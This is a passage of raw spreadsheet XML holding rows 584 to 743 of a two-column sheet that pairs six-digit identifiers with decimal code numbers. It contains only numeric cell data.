    </row>
    <row r="584" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A584" s="5">
        <v>500096</v>
      </c>
      <c r="B584" s="3">
        <v>901218.01100000006</v>
      </c>
    </row>
    <row r="585" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A585" s="5">
        <v>500096</v>
      </c>
      <c r="B585" s="3">
        <v>901553.00199999998</v>
      </c>
    </row>
    <row r="586" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A586" s="5">
        <v>500096</v>
      </c>
      <c r="B586" s="3">
        <v>901195.00199999998</v>
      </c>
    </row>
    <row r="587" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A587" s="5">
        <v>500096</v>
      </c>
      <c r="B587" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="588" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A588" s="5">
        <v>500096</v>
      </c>
      <c r="B588" s="3">
        <v>901049</v>
      </c>
    </row>
    <row r="589" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A589" s="5">
        <v>500096</v>
      </c>
      <c r="B589" s="3">
        <v>901033</v>
      </c>
    </row>
    <row r="590" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A590" s="5">
        <v>500096</v>
      </c>
      <c r="B590" s="3">
        <v>901569.00199999998</v>
      </c>
    </row>
    <row r="591" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A591" s="5">
        <v>500096</v>
      </c>
      <c r="B591" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="592" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A592" s="5">
        <v>500096</v>
      </c>
      <c r="B592" s="3">
        <v>901102.00100000005</v>
      </c>
    </row>
    <row r="593" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A593" s="5">
        <v>500096</v>
      </c>
      <c r="B593" s="3">
        <v>901047</v>
      </c>
    </row>
    <row r="594" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A594" s="5">
        <v>500001</v>
      </c>
      <c r="B594" s="3">
        <v>901001</v>
      </c>
    </row>
    <row r="595" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A595" s="5">
        <v>500001</v>
      </c>
      <c r="B595" s="3">
        <v>901001.00199999998</v>
      </c>
    </row>
    <row r="596" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A596" s="5">
        <v>500001</v>
      </c>
      <c r="B596" s="3">
        <v>901546.00800000003</v>
      </c>
    </row>
    <row r="597" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A597" s="5">
        <v>500001</v>
      </c>
      <c r="B597" s="3">
        <v>901190</v>
      </c>
    </row>
    <row r="598" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A598" s="5">
        <v>500001</v>
      </c>
      <c r="B598" s="3">
        <v>901003</v>
      </c>
    </row>
    <row r="599" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A599" s="5">
        <v>500001</v>
      </c>
      <c r="B599" s="3">
        <v>901021.00100000005</v>
      </c>
    </row>
    <row r="600" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A600" s="5">
        <v>500135</v>
      </c>
      <c r="B600" s="3">
        <v>901074.00100000005</v>
      </c>
    </row>
    <row r="601" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A601" s="5">
        <v>500135</v>
      </c>
      <c r="B601" s="3">
        <v>901190</v>
      </c>
    </row>
    <row r="602" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A602" s="5">
        <v>500135</v>
      </c>
      <c r="B602" s="3">
        <v>901574.00100000005</v>
      </c>
    </row>
    <row r="603" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A603" s="5">
        <v>500135</v>
      </c>
      <c r="B603" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="604" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A604" s="5">
        <v>500135</v>
      </c>
      <c r="B604" s="3">
        <v>901036.00399999996</v>
      </c>
    </row>
    <row r="605" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A605" s="5">
        <v>500135</v>
      </c>
      <c r="B605" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="606" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A606" s="5">
        <v>500135</v>
      </c>
      <c r="B606" s="3">
        <v>901046</v>
      </c>
    </row>
    <row r="607" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A607" s="5">
        <v>500135</v>
      </c>
      <c r="B607" s="3">
        <v>901095</v>
      </c>
    </row>
    <row r="608" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A608" s="5">
        <v>500135</v>
      </c>
      <c r="B608" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="609" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A609" s="5">
        <v>500135</v>
      </c>
      <c r="B609" s="3">
        <v>901588.00100000005</v>
      </c>
    </row>
    <row r="610" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A610" s="5">
        <v>500135</v>
      </c>
      <c r="B610" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="611" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A611" s="5">
        <v>500135</v>
      </c>
      <c r="B611" s="3">
        <v>901120</v>
      </c>
    </row>
    <row r="612" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A612" s="5">
        <v>500135</v>
      </c>
      <c r="B612" s="3">
        <v>901055.00100000005</v>
      </c>
    </row>
    <row r="613" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A613" s="5">
        <v>500135</v>
      </c>
      <c r="B613" s="3">
        <v>901505.00300000003</v>
      </c>
    </row>
    <row r="614" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A614" s="5">
        <v>500135</v>
      </c>
      <c r="B614" s="3">
        <v>901049</v>
      </c>
    </row>
    <row r="615" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A615" s="5">
        <v>500063</v>
      </c>
      <c r="B615" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="616" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A616" s="5">
        <v>500098</v>
      </c>
      <c r="B616" s="3">
        <v>901190</v>
      </c>
    </row>
    <row r="617" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A617" s="5">
        <v>500098</v>
      </c>
      <c r="B617" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="618" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A618" s="5">
        <v>500098</v>
      </c>
      <c r="B618" s="3">
        <v>901574.00199999998</v>
      </c>
    </row>
    <row r="619" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A619" s="5">
        <v>500098</v>
      </c>
      <c r="B619" s="3">
        <v>901036.00199999998</v>
      </c>
    </row>
    <row r="620" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A620" s="5">
        <v>500098</v>
      </c>
      <c r="B620" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="621" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A621" s="5">
        <v>500098</v>
      </c>
      <c r="B621" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="622" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A622" s="5">
        <v>500098</v>
      </c>
      <c r="B622" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="623" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A623" s="5">
        <v>500098</v>
      </c>
      <c r="B623" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="624" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A624" s="5">
        <v>500108</v>
      </c>
      <c r="B624" s="3">
        <v>901134</v>
      </c>
    </row>
    <row r="625" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A625" s="5">
        <v>500108</v>
      </c>
      <c r="B625" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="626" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A626" s="5">
        <v>500108</v>
      </c>
      <c r="B626" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="627" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A627" s="5">
        <v>500108</v>
      </c>
      <c r="B627" s="3">
        <v>901543.00300000003</v>
      </c>
    </row>
    <row r="628" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A628" s="5">
        <v>500108</v>
      </c>
      <c r="B628" s="3">
        <v>901546.00300000003</v>
      </c>
    </row>
    <row r="629" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A629" s="5">
        <v>500108</v>
      </c>
      <c r="B629" s="3">
        <v>901190</v>
      </c>
    </row>
    <row r="630" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A630" s="5">
        <v>500108</v>
      </c>
      <c r="B630" s="3">
        <v>901574.01199999999</v>
      </c>
    </row>
    <row r="631" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A631" s="5">
        <v>500108</v>
      </c>
      <c r="B631" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="632" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A632" s="5">
        <v>500108</v>
      </c>
      <c r="B632" s="3">
        <v>901112</v>
      </c>
    </row>
    <row r="633" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A633" s="5">
        <v>500108</v>
      </c>
      <c r="B633" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="634" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A634" s="5">
        <v>500108</v>
      </c>
      <c r="B634" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="635" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A635" s="5">
        <v>500108</v>
      </c>
      <c r="B635" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="636" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A636" s="5">
        <v>500108</v>
      </c>
      <c r="B636" s="3">
        <v>901090</v>
      </c>
    </row>
    <row r="637" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A637" s="5">
        <v>500108</v>
      </c>
      <c r="B637" s="3">
        <v>901021.00100000005</v>
      </c>
    </row>
    <row r="638" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A638" s="5">
        <v>500108</v>
      </c>
      <c r="B638" s="3">
        <v>901021.00199999998</v>
      </c>
    </row>
    <row r="639" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A639" s="5">
        <v>500108</v>
      </c>
      <c r="B639" s="3">
        <v>901496</v>
      </c>
    </row>
    <row r="640" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A640" s="5">
        <v>500108</v>
      </c>
      <c r="B640" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="641" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A641" s="5">
        <v>500108</v>
      </c>
      <c r="B641" s="3">
        <v>901218.01</v>
      </c>
    </row>
    <row r="642" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A642" s="5">
        <v>500108</v>
      </c>
      <c r="B642" s="3">
        <v>901218.01100000006</v>
      </c>
    </row>
    <row r="643" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A643" s="5">
        <v>500108</v>
      </c>
      <c r="B643" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="644" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A644" s="5">
        <v>500108</v>
      </c>
      <c r="B644" s="3">
        <v>901569.00199999998</v>
      </c>
    </row>
    <row r="645" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A645" s="5">
        <v>500108</v>
      </c>
      <c r="B645" s="3">
        <v>901047</v>
      </c>
    </row>
    <row r="646" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A646" s="5">
        <v>500097</v>
      </c>
      <c r="B646" s="3">
        <v>901476</v>
      </c>
    </row>
    <row r="647" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A647" s="5">
        <v>500097</v>
      </c>
      <c r="B647" s="3">
        <v>901444</v>
      </c>
    </row>
    <row r="648" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A648" s="5">
        <v>500060</v>
      </c>
      <c r="B648" s="3">
        <v>901548.00199999998</v>
      </c>
    </row>
    <row r="649" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A649" s="5">
        <v>500060</v>
      </c>
      <c r="B649" s="3">
        <v>901087.00199999998</v>
      </c>
    </row>
    <row r="650" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A650" s="5">
        <v>500060</v>
      </c>
      <c r="B650" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="651" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A651" s="5">
        <v>500060</v>
      </c>
      <c r="B651" s="3">
        <v>901560.00100000005</v>
      </c>
    </row>
    <row r="652" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A652" s="5">
        <v>500060</v>
      </c>
      <c r="B652" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="653" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A653" s="5">
        <v>500060</v>
      </c>
      <c r="B653" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="654" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A654" s="5">
        <v>500060</v>
      </c>
      <c r="B654" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="655" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A655" s="5">
        <v>500060</v>
      </c>
      <c r="B655" s="3">
        <v>901059.00600000005</v>
      </c>
    </row>
    <row r="656" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A656" s="5">
        <v>500060</v>
      </c>
      <c r="B656" s="3">
        <v>901132.00100000005</v>
      </c>
    </row>
    <row r="657" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A657" s="5">
        <v>500060</v>
      </c>
      <c r="B657" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="658" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A658" s="5">
        <v>500060</v>
      </c>
      <c r="B658" s="3">
        <v>901039</v>
      </c>
    </row>
    <row r="659" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A659" s="5">
        <v>500060</v>
      </c>
      <c r="B659" s="3">
        <v>901140</v>
      </c>
    </row>
    <row r="660" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A660" s="5">
        <v>500060</v>
      </c>
      <c r="B660" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="661" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A661" s="5">
        <v>500060</v>
      </c>
      <c r="B661" s="3">
        <v>901573.00100000005</v>
      </c>
    </row>
    <row r="662" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A662" s="5">
        <v>500060</v>
      </c>
      <c r="B662" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="663" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A663" s="5">
        <v>500060</v>
      </c>
      <c r="B663" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="664" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A664" s="5">
        <v>500060</v>
      </c>
      <c r="B664" s="3">
        <v>901574.00199999998</v>
      </c>
    </row>
    <row r="665" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A665" s="5">
        <v>500060</v>
      </c>
      <c r="B665" s="3">
        <v>901562.00100000005</v>
      </c>
    </row>
    <row r="666" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A666" s="5">
        <v>500060</v>
      </c>
      <c r="B666" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="667" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A667" s="5">
        <v>500060</v>
      </c>
      <c r="B667" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="668" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A668" s="5">
        <v>500060</v>
      </c>
      <c r="B668" s="3">
        <v>901036</v>
      </c>
    </row>
    <row r="669" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A669" s="5">
        <v>500060</v>
      </c>
      <c r="B669" s="3">
        <v>901036.00199999998</v>
      </c>
    </row>
    <row r="670" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A670" s="5">
        <v>500060</v>
      </c>
      <c r="B670" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="671" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A671" s="5">
        <v>500060</v>
      </c>
      <c r="B671" s="3">
        <v>901027.00100000005</v>
      </c>
    </row>
    <row r="672" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A672" s="5">
        <v>500060</v>
      </c>
      <c r="B672" s="3">
        <v>901027.00300000003</v>
      </c>
    </row>
    <row r="673" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A673" s="5">
        <v>500060</v>
      </c>
      <c r="B673" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="674" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A674" s="5">
        <v>500060</v>
      </c>
      <c r="B674" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="675" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A675" s="5">
        <v>500060</v>
      </c>
      <c r="B675" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="676" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A676" s="5">
        <v>500060</v>
      </c>
      <c r="B676" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="677" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A677" s="5">
        <v>500060</v>
      </c>
      <c r="B677" s="3">
        <v>901053.00199999998</v>
      </c>
    </row>
    <row r="678" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A678" s="5">
        <v>500060</v>
      </c>
      <c r="B678" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="679" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A679" s="5">
        <v>500060</v>
      </c>
      <c r="B679" s="3">
        <v>901113</v>
      </c>
    </row>
    <row r="680" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A680" s="5">
        <v>500060</v>
      </c>
      <c r="B680" s="3">
        <v>901518</v>
      </c>
    </row>
    <row r="681" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A681" s="5">
        <v>500060</v>
      </c>
      <c r="B681" s="3">
        <v>901007</v>
      </c>
    </row>
    <row r="682" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A682" s="5">
        <v>500060</v>
      </c>
      <c r="B682" s="3">
        <v>901124</v>
      </c>
    </row>
    <row r="683" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A683" s="5">
        <v>500060</v>
      </c>
      <c r="B683" s="3">
        <v>901080</v>
      </c>
    </row>
    <row r="684" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A684" s="5">
        <v>500060</v>
      </c>
      <c r="B684" s="3">
        <v>901550.00300000003</v>
      </c>
    </row>
    <row r="685" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A685" s="5">
        <v>500060</v>
      </c>
      <c r="B685" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="686" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A686" s="5">
        <v>500060</v>
      </c>
      <c r="B686" s="3">
        <v>901102.00100000005</v>
      </c>
    </row>
    <row r="687" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A687" s="5">
        <v>500008</v>
      </c>
      <c r="B687" s="3">
        <v>901543.00300000003</v>
      </c>
    </row>
    <row r="688" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A688" s="5">
        <v>500008</v>
      </c>
      <c r="B688" s="3">
        <v>901562.00399999996</v>
      </c>
    </row>
    <row r="689" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A689" s="5">
        <v>500008</v>
      </c>
      <c r="B689" s="3">
        <v>901036.00399999996</v>
      </c>
    </row>
    <row r="690" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A690" s="5">
        <v>500008</v>
      </c>
      <c r="B690" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="691" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A691" s="5">
        <v>500008</v>
      </c>
      <c r="B691" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="692" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A692" s="5">
        <v>500008</v>
      </c>
      <c r="B692" s="3">
        <v>901219</v>
      </c>
    </row>
    <row r="693" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A693" s="5">
        <v>500008</v>
      </c>
      <c r="B693" s="3">
        <v>901218.01100000006</v>
      </c>
    </row>
    <row r="694" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A694" s="5">
        <v>500008</v>
      </c>
      <c r="B694" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="695" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A695" s="5">
        <v>500008</v>
      </c>
      <c r="B695" s="3">
        <v>901102.00199999998</v>
      </c>
    </row>
    <row r="696" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A696" s="5">
        <v>500114</v>
      </c>
      <c r="B696" s="3">
        <v>901087.00100000005</v>
      </c>
    </row>
    <row r="697" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A697" s="5">
        <v>500114</v>
      </c>
      <c r="B697" s="3">
        <v>901087.00199999998</v>
      </c>
    </row>
    <row r="698" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A698" s="5">
        <v>500114</v>
      </c>
      <c r="B698" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="699" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A699" s="5">
        <v>500114</v>
      </c>
      <c r="B699" s="3">
        <v>901071.00399999996</v>
      </c>
    </row>
    <row r="700" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A700" s="5">
        <v>500114</v>
      </c>
      <c r="B700" s="3">
        <v>901560.00100000005</v>
      </c>
    </row>
    <row r="701" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A701" s="5">
        <v>500114</v>
      </c>
      <c r="B701" s="3">
        <v>901119</v>
      </c>
    </row>
    <row r="702" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A702" s="5">
        <v>500114</v>
      </c>
      <c r="B702" s="3">
        <v>901217</v>
      </c>
    </row>
    <row r="703" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A703" s="5">
        <v>500114</v>
      </c>
      <c r="B703" s="3">
        <v>901110.00300000003</v>
      </c>
    </row>
    <row r="704" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A704" s="5">
        <v>500114</v>
      </c>
      <c r="B704" s="3">
        <v>901110.00399999996</v>
      </c>
    </row>
    <row r="705" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A705" s="5">
        <v>500114</v>
      </c>
      <c r="B705" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="706" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A706" s="5">
        <v>500114</v>
      </c>
      <c r="B706" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="707" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A707" s="5">
        <v>500114</v>
      </c>
      <c r="B707" s="3">
        <v>901213.00199999998</v>
      </c>
    </row>
    <row r="708" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A708" s="5">
        <v>500114</v>
      </c>
      <c r="B708" s="3">
        <v>901039</v>
      </c>
    </row>
    <row r="709" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A709" s="5">
        <v>500114</v>
      </c>
      <c r="B709" s="3">
        <v>901074.00100000005</v>
      </c>
    </row>
    <row r="710" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A710" s="5">
        <v>500114</v>
      </c>
      <c r="B710" s="3">
        <v>901074.00199999998</v>
      </c>
    </row>
    <row r="711" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A711" s="5">
        <v>500114</v>
      </c>
      <c r="B711" s="3">
        <v>901482</v>
      </c>
    </row>
    <row r="712" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A712" s="5">
        <v>500114</v>
      </c>
      <c r="B712" s="3">
        <v>901114.00100000005</v>
      </c>
    </row>
    <row r="713" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A713" s="5">
        <v>500114</v>
      </c>
      <c r="B713" s="3">
        <v>901114.00199999998</v>
      </c>
    </row>
    <row r="714" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A714" s="5">
        <v>500114</v>
      </c>
      <c r="B714" s="3">
        <v>901041</v>
      </c>
    </row>
    <row r="715" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A715" s="5">
        <v>500114</v>
      </c>
      <c r="B715" s="3">
        <v>901567.00199999998</v>
      </c>
    </row>
    <row r="716" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A716" s="5">
        <v>500114</v>
      </c>
      <c r="B716" s="3">
        <v>901133</v>
      </c>
    </row>
    <row r="717" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A717" s="5">
        <v>500114</v>
      </c>
      <c r="B717" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="718" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A718" s="5">
        <v>500114</v>
      </c>
      <c r="B718" s="3">
        <v>901589.00100000005</v>
      </c>
    </row>
    <row r="719" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A719" s="5">
        <v>500114</v>
      </c>
      <c r="B719" s="3">
        <v>901574.00199999998</v>
      </c>
    </row>
    <row r="720" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A720" s="5">
        <v>500114</v>
      </c>
      <c r="B720" s="3">
        <v>901070.00100000005</v>
      </c>
    </row>
    <row r="721" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A721" s="5">
        <v>500114</v>
      </c>
      <c r="B721" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="722" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A722" s="5">
        <v>500114</v>
      </c>
      <c r="B722" s="3">
        <v>901070.00600000005</v>
      </c>
    </row>
    <row r="723" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A723" s="5">
        <v>500114</v>
      </c>
      <c r="B723" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="724" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A724" s="5">
        <v>500114</v>
      </c>
      <c r="B724" s="3">
        <v>901570</v>
      </c>
    </row>
    <row r="725" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A725" s="5">
        <v>500114</v>
      </c>
      <c r="B725" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="726" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A726" s="5">
        <v>500114</v>
      </c>
      <c r="B726" s="3">
        <v>901556.00100000005</v>
      </c>
    </row>
    <row r="727" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A727" s="5">
        <v>500114</v>
      </c>
      <c r="B727" s="3">
        <v>901106</v>
      </c>
    </row>
    <row r="728" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A728" s="5">
        <v>500114</v>
      </c>
      <c r="B728" s="3">
        <v>901046</v>
      </c>
    </row>
    <row r="729" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A729" s="5">
        <v>500114</v>
      </c>
      <c r="B729" s="3">
        <v>901135</v>
      </c>
    </row>
    <row r="730" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A730" s="5">
        <v>500114</v>
      </c>
      <c r="B730" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="731" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A731" s="5">
        <v>500114</v>
      </c>
      <c r="B731" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="732" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A732" s="5">
        <v>500114</v>
      </c>
      <c r="B732" s="3">
        <v>901003.00300000003</v>
      </c>
    </row>
    <row r="733" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A733" s="5">
        <v>500114</v>
      </c>
      <c r="B733" s="3">
        <v>901201</v>
      </c>
    </row>
    <row r="734" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A734" s="5">
        <v>500114</v>
      </c>
      <c r="B734" s="3">
        <v>901069.00100000005</v>
      </c>
    </row>
    <row r="735" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A735" s="5">
        <v>500114</v>
      </c>
      <c r="B735" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="736" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A736" s="5">
        <v>500114</v>
      </c>
      <c r="B736" s="3">
        <v>901572</v>
      </c>
    </row>
    <row r="737" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A737" s="5">
        <v>500114</v>
      </c>
      <c r="B737" s="3">
        <v>901012</v>
      </c>
    </row>
    <row r="738" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A738" s="5">
        <v>500114</v>
      </c>
      <c r="B738" s="3">
        <v>901021.00100000005</v>
      </c>
    </row>
    <row r="739" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A739" s="5">
        <v>500114</v>
      </c>
      <c r="B739" s="3">
        <v>901021.00199999998</v>
      </c>
    </row>
    <row r="740" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A740" s="5">
        <v>500114</v>
      </c>
      <c r="B740" s="3">
        <v>901021.00600000005</v>
      </c>
    </row>
    <row r="741" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A741" s="5">
        <v>500114</v>
      </c>
      <c r="B741" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="742" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A742" s="5">
        <v>500114</v>
      </c>
      <c r="B742" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="743" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A743" s="5">
        <v>500114</v>
      </c>
      <c r="B743" s="3">
